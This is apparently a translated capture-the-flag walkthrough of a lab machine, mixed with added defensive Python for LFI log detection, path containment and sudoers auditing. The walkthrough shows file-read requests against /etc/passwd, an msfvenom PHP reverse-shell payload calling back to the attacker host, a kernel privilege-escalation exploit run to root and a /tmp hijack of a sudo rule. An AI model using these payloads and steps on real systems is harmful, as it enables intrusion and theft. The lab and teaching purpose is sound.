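# Values that should never appear in a file-name parameter from a normal visitor.
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/root/", "/home/", "/var/log/", "/var/www/")
STREAM_WRAPPERS = ("php://", "file://", "data:")


def parse_line(line):
    """Return a dict with ip, path, status and decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl decodes once; a second unquote catches double-encoded payloads.
    rec["params"] = [(k, unquote(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return rec


def is_lfi_probe(value):
    """True when a parameter value looks like a path-traversal or file-read attempt."""
    v = value.replace("\\", "/").lower()
    return ("../" in v or "\x00" in v
            or v.startswith(SENSITIVE_PREFIXES) or v.startswith(STREAM_WRAPPERS))


def analyze(lines, fuzz_threshold=20):
    """Flag LFI-looking parameter values and clients that fuzz parameter names.

    A client that sends `fuzz_threshold` or more distinct parameter names to
    the same script (as wfuzz does with a wordlist) is reported as fuzzing.
    """
    lfi_hits = []
    names_seen = defaultdict(set)   # (ip, path) -> parameter names used
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            names_seen[(rec["ip"], rec["path"])].add(name)
            if is_lfi_probe(value):
                lfi_hits.append((rec["ip"], rec["path"], name, value, rec["status"]))
    fuzzing_ips = sorted({ip for (ip, _), names in names_seen.items() if len(names) >= fuzz_threshold})
    return {
        "lfi_hits": lfi_hits,
        "hits_by_ip": Counter(hit[0] for hit in lfi_hits),
        "fuzzing_ips": fuzzing_ips,
    }


# --- constructed sample log (parameter names taken from the wordlist above) ---
ATTACKER = "192.168.116.1"
_FUZZ_NAMES = ["calculate", "cancel", "change", "check", "click", "clear", "clone", "close",
               "create", "crypt", "decrypt", "del", "delete", "demo", "disable", "dl",
               "download", "enable", "encrypt", "edit", "exec", "execute", "file", "focus", "get"]
SAMPLE_LOG = [
    f'{ATTACKER} - - [20/Sep/2019:07:30:{i:02d} +0800] "GET /index.php?{name}=/etc/passwd HTTP/1.1" '
    f'200 {206 if name == "file" else 136} "-" "Wfuzz/2.4"'
    for i, name in enumerate(_FUZZ_NAMES)
] + [
    f'{ATTACKER} - - [20/Sep/2019:07:35:12 +0800] "GET /index.php?file=location.txt HTTP/1.1" 200 330 "-" "curl/7.65.3"',
    f'{ATTACKER} - - [20/Sep/2019:07:36:40 +0800] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2510 "-" "curl/7.65.3"',
    '192.168.116.50 - - [20/Sep/2019:07:40:00 +0800] "GET /wordpress/ HTTP/1.1" 200 14411 "-" "Mozilla/5.0"',
    '192.168.116.50 - - [20/Sep/2019:07:40:03 +0800] "GET /image.php?secrettier360=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2510 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("fuzzing clients:", report["fuzzing_ips"])
    for ip, n in report["hits_by_ip"].items():
        print(f"{ip}: {n} LFI-looking requests")
```

    Two things the paragraph alone does not show: the one request that reads location.txt is a legitimate-looking file name and is not flagged, while the URL-encoded traversal from the second client is caught because the query string is decoded before inspection. The wordlist burst is detected purely by the number of distinct parameter names one client throws at a single script, which is independent of what the values are.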
    
    • The hint says to try the secrettier360 parameter on another php page. dirb only turned up two special php files, so that means http://192.168.116.132/image.php; fuzz again with secrettier360 added. This reveals an arbitrary file read: http://192.168.116.132/image.php?secrettier360=/etc/passwd reads /etc/passwd.
    ➜  ~ curl http://192.168.116.132/image.php?secrettier360=/etc/passwd                                                    
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
    </body>
    finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    syslog:x:104:108::/home/syslog:/bin/false
    _apt:x:105:65534::/nonexistent:/bin/false
    messagebus:x:106:110::/var/run/dbus:/bin/false
    uuidd:x:107:111::/run/uuidd:/bin/false
    lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
    whoopsie:x:109:117::/nonexistent:/bin/false
    avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
    colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
    speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
    hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
    saned:x:119:127::/var/lib/saned:/bin/false
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
    mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
    saket:x:1001:1001:find password.txt file in my directory:/home/saket:
    sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
    guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
    </html>
    ➜  ~
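
    Behind image.php?secrettier360=... is a script that takes the parameter value as a path and reads it without checking where it points. The Python below is an added example (not code from the writeup or from the VM) that puts that pattern next to a hardened version which canonicalises the path and refuses anything outside the web root; the demo directory tree and the password string in it are constructed for the example.

```python
"""Path containment for a user-controlled file parameter.

Added example, not code from the original writeup or the target VM. It
contrasts the pattern behind image.php?secrettier360=... (user value joined
onto the web root and read as-is) with a version that resolves the path and
refuses anything outside the web root. The demo directory tree and the
password string in it are constructed here, not taken from the box.
"""
import os
import tempfile

ALLOWED_SUFFIXES = (".txt", ".png")


def read_file_unsafe(webroot, requested):
    """The vulnerable pattern. os.path.join drops `webroot` entirely when
    `requested` is absolute, and "../" segments walk out of it, so any file
    readable by the web server user can be returned."""
    with open(os.path.join(webroot, requested), "rb") as f:
        return f.read()


def read_file_safe(webroot, requested):
    """Hardened version: canonicalise, then verify the result is still inside
    the web root and has an expected extension before opening it."""
    if "\x00" in requested:
        raise PermissionError("NUL byte in file name")
    root = os.path.realpath(webroot)
    # realpath also follows symlinks, so a link inside the web root that points
    # elsewhere is resolved and rejected by the containment check below.
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"path escapes web root: {requested!r}")
    if not target.endswith(ALLOWED_SUFFIXES):
        raise PermissionError(f"file type not allowed: {requested!r}")
    if not os.path.isfile(target):
        raise FileNotFoundError(requested)
    with open(target, "rb") as f:
        return f.read()


def build_demo_tree():
    """Create a throwaway tree: <base>/html is the web root, and
    <base>/home/saket/password.txt sits outside it (constructed content)."""
    base = tempfile.mkdtemp(prefix="lfi-demo-")
    webroot = os.path.join(base, "html")
    os.makedirs(webroot)
    with open(os.path.join(webroot, "location.txt"), "w") as f:
        f.write("use 'secrettier360' parameter on some other php page\n")
    os.makedirs(os.path.join(base, "home", "saket"))
    secret = os.path.join(base, "home", "saket", "password.txt")
    with open(secret, "w") as f:
        f.write("constructed-placeholder-password\n")   # constructed, not the VM's
    return webroot, secret


def demo():
    """Run both readers against the same requests and collect what each returns."""
    webroot, secret = build_demo_tree()
    results = {
        "unsafe_absolute": read_file_unsafe(webroot, secret),
        "unsafe_traversal": read_file_unsafe(webroot, "../home/saket/password.txt"),
        "safe_legit": read_file_safe(webroot, "location.txt"),
    }
    for label, req in (("safe_absolute", secret), ("safe_traversal", "../home/saket/password.txt")):
        try:
            read_file_safe(webroot, req)
            results[label] = "ALLOWED"
        except PermissionError:
            results[label] = "blocked"
    return results


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label:17s} -> {value!r}")
```

    The containment check has to run on the canonical path, after join and realpath, not on the raw string: string filters for "../" miss absolute paths (which is exactly what the writeup used) and encoded variants, while a realpath-based comparison catches both along with symlinks planted inside the web root.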
    
    • There is a guest account as well as a victor account, and the guest account turns out to log in directly; under normal circumstances there would be no way to log in to the server like this. It is only because the server exposes a VNC service that logging in as the guest account is possible at all.
    root:x:0:0:root:/root:/bin/bash
    victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
    guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
    saket:x:1001:1001:find password.txt file in my directory:/home/saket:
    
    • Logged in as the guest account, there is a server backup folder under /opt:
    your password for backup_database file enc is 
    
    "backup_password"
    
    
    Enjoy!
    
    • Later, checking the Linux version, it turns out the box can be rooted directly. Well, that makes it rather dull, not that it was exciting to begin with. Either way you end up using an exploit for privilege escalation, just not by logging in as the guest account directly. Escalating from the guest account also took the web service down.
    guest-uw1hdg@ubuntu:~/Desktop$ gcc exp.c 
    guest-uw1hdg@ubuntu:~/Desktop$ ./a.out 
    [.] 
    [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
    [.] 
    [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
    [.] 
    [*] creating bpf map
    [*] sneaking evil bpf past the verifier
    [*] creating socketpair()
    [*] attaching bpf backdoor to socket
    [*] skbuff => ffff955bf2847500
    [*] Leaking sock struct from ffff955bef6a6c00
    [*] Sock->sk_rcvtimeo at offset 592
    [*] Cred structure at ffff955bf0c7e0c0
    [*] UID from cred structure: 999, matches the current: 999
    [*] hammering cred structure at ffff955bf0c7e0c0
    [*] credentials patched, launching shell...
    # id
    uid=0(root) gid=0(root) groups=0(root),999(guest-uw1hdg)
    #
    

    The normal route

    • The goal is the password.txt file in saket's home directory. Trying http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt gives the password: follow_the_ippsec
    ➜  ~ curl http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt  
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
    </body>
    finaly you got the right parameter<br><br><br><br>follow_the_ippsec
    </html>
    ➜  ~
    
    • Look for the author's username in the WordPress posts. There is only one post, and its author is victor; log in with that username and password. This is why you should set a separate display name for authors in WordPress, so that nobody can guess the login username from it.
    • Once in the admin panel, upload a web shell; no need to go into detail, there are all sorts of ways, such as editing the theme.
    ➜  ~ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.116.1 LPORT=7788 -o shell.php 
    [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    [-] No arch selected, selecting arch: php from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 30656 bytes
    Saved as: shell.php
    
    msf5 > use exploit/m
    Display all 313 possibilities? (y or n)
    msf5 > use exploit/multi/handler 
    msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
    payload => php/meterpreter_reverse_tcp
    msf5 exploit(multi/handler) > set lport 7788
    lport => 7788
    msf5 exploit(multi/handler) > set lhost 192.168.116.1
    lhost => 192.168.116.1
    msf5 exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:7788 
    [*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.132:43802) at 2019-09-20 11:31:27 +0800
    
    • Interactive terminal: python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@ubuntu:/home/saket$ uname -a	
    uname -a
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    www-data@ubuntu:/home/saket$
    
    • Privilege escalation via CVE-2017-16995: https://github.com/SecWiki/linux-kernel-exploits/tree/master/2017/CVE-2017-16995
    • Upload it to the server, compile it with gcc and run it to get root.
    • Or use the module that ships with msf:
    msf5 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
    msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
    msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set lhost 192.168.116.1
    lhost => 192.168.116.1
    msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run 
    [!] SESSION may not be compatible with this module.
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Writing '/tmp/.Glz23KY6oY.c' (10867 bytes) ...
    [*] Writing '/tmp/.UaPN30M' (207 bytes) ...
    [*] Launching exploit ...
    [*] Sending stage (985320 bytes) to 192.168.116.132
    [*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.132:48326) at 2019-09-20 12:40:28 +0800
    meterpreter > sysinfo 
    Computer     : 192.168.116.132
    OS           : Ubuntu 16.04 (Linux 4.10.0-28-generic)
    Architecture : x64
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > shell 
    Process 2362 created.
    Channel 1 created.
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    

    Privilege escalation without an exploit

    Actually there is an executable called enc in saket's directory. Run it and enter the backup_password found above; it copies two files into saket's home directory, giving us enc.txt and key.txt.

    www-data@ubuntu:/home/saket$ ./enc
    ./enc
    enter password: backup_password
    backup_password
    good
    /bin/cp: cannot stat '/root/enc.txt': Permission denied
    /bin/cp: cannot stat '/root/key.txt': Permission denied
    www-data@ubuntu:/home/saket$ whoami
    whoami
    www-data
    www-data@ubuntu:/home/saket$ sudo ./enc
    sudo ./enc
    enter password: backup_password
    backup_password
    good
    www-data@ubuntu:/home/saket$ ls
    ls
    enc  enc.txt  key.txt  password.txt  user.txt
    www-data@ubuntu:/home/saket$
    
    • After decrypting and then base64-decoding, saket's password turns out to be tribute_to_ippsec
    ➜  ~ echo "RG9udCB3b3JyeSBzYWtldCBvbmUgZGF5IHdlIHdpbGwgcmVhY2ggdG8Kb3VyIGRlc3RpbmF0aW9uIHZlcnkgc29vbi4gQW5kIGlmIHlvdSBmb3JnZXQgCnlvdXIgdXNlcm5hbWUgdGhlbiB1c2UgeW91ciBvbGQgcGFzc3dvcmQKPT0+ICJ0cmlidXRlX3RvX2lwcHNlYyIKClZpY3Rvciw="|base64 -d
    Dont worry saket one day we will reach to
    our destination very soon. And if you forget 
    your username then use your old password
    ==> "tribute_to_ippsec"
    
    Victor,%
    
    • Switch to the saket user
    www-data@ubuntu:/home/saket$ su saket
    su saket
    Password: tribute_to_ippsec
    
    saket@ubuntu:~$   
    saket@ubuntu:~$ sudo -l
    sudo -l
    Matching Defaults entries for saket on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User saket may run the following commands on ubuntu:
        (root) NOPASSWD: /home/victor/undefeated_victor
    saket@ubuntu:~$
    
    • /home/victor/undefeated_victor can be run through sudo without a password
    saket@ubuntu:~$ sudo /home/victor/undefeated_victor
    sudo /home/victor/undefeated_victor
    if you can defeat me then challenge me in front of you
    /home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
    saket@ubuntu:~$
    
    • The file /tmp/challenge does not exist; copying bash to /tmp/challenge lets commands run with victor's privileges.
    saket@ubuntu:~$ pwd
    pwd
    /home/saket
    saket@ubuntu:~$ cp /bin/bash /tmp/challenge
    cp /bin/bash /tmp/challenge
    saket@ubuntu:~$ sudo /home/victor/undefeated_victor
    sudo /home/victor/undefeated_victor
    if you can defeat me then challenge me in front of you
    root@ubuntu:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~#
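
    The sudo rule is only a problem because the script it points at runs a path under /tmp, where any local user can create a file, so the missing /tmp/challenge is the whole weakness. As an added example (not from the writeup), the Python below parses the `sudo -l` output shown above and scans a script body for references to world-writable directories. Since the real undefeated_victor is not on the page, SAMPLE_SCRIPT is a constructed stand-in built from its two observable lines (the echoed message and the "/tmp/challenge: not found" error).

```python
"""Audit a sudoers rule whose target script reaches into a world-writable directory.

Added example, not from the original writeup. SAMPLE_SUDO_L is the `sudo -l`
output shown in the writeup; SAMPLE_SCRIPT is a constructed stand-in for
/home/victor/undefeated_victor built from the two lines that are observable
(the echoed message and the "/tmp/challenge: not found" error), because the
real script is not on the page.
"""
import re

# Directories any local user can create files in.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# One rule line of `sudo -l` output: "(runas) [TAG: ...] /absolute/command [args]".
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

SAMPLE_SUDO_L = """\
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
"""

# Constructed stand-in for the script body (see module docstring).
SAMPLE_SCRIPT = """\
#!/bin/sh
echo "if you can defeat me then challenge me in front of you"
/tmp/challenge
"""


def parse_sudo_l(text):
    """Extract runas user, NOPASSWD flag and command path from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"],
                          "nopasswd": "NOPASSWD" in m["tags"],
                          "cmd": m["cmd"]})
    return rules


def audit_script(text):
    """Return (lineno, token) for every path under a world-writable directory
    that the script references. Whether or not the file exists right now does
    not matter: a missing file there can be planted by any local user and will
    then run with the script's privileges."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for token in stripped.split():
            token = token.strip("\"'`;&|()")
            if token.startswith(WORLD_WRITABLE_DIRS):
                findings.append((lineno, token))
    return findings


def audit_rules(sudo_l_text, script_sources):
    """Combine both checks: for every rule that runs as root, audit the script
    body if we have it. `script_sources` maps command path -> script text."""
    report = []
    for rule in parse_sudo_l(sudo_l_text):
        if rule["runas"] != "root":
            continue
        body = script_sources.get(rule["cmd"])
        findings = audit_script(body) if body is not None else []
        report.append({**rule, "world_writable_refs": findings})
    return report


if __name__ == "__main__":
    for entry in audit_rules(SAMPLE_SUDO_L, {"/home/victor/undefeated_victor": SAMPLE_SCRIPT}):
        flag = "NOPASSWD " if entry["nopasswd"] else ""
        print(f"({entry['runas']}) {flag}{entry['cmd']}: {entry['world_writable_refs']}")
```

    The secure_path in the Defaults above already stops PATH hijacking of relative command names, which is why the audit concentrates on absolute references into /tmp, /var/tmp and /dev/shm; the fix for a script like this is to call a root-owned path in a directory only root can write to.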
    
  • Original article: https://www.cnblogs.com/Kali-Team/p/12212368.html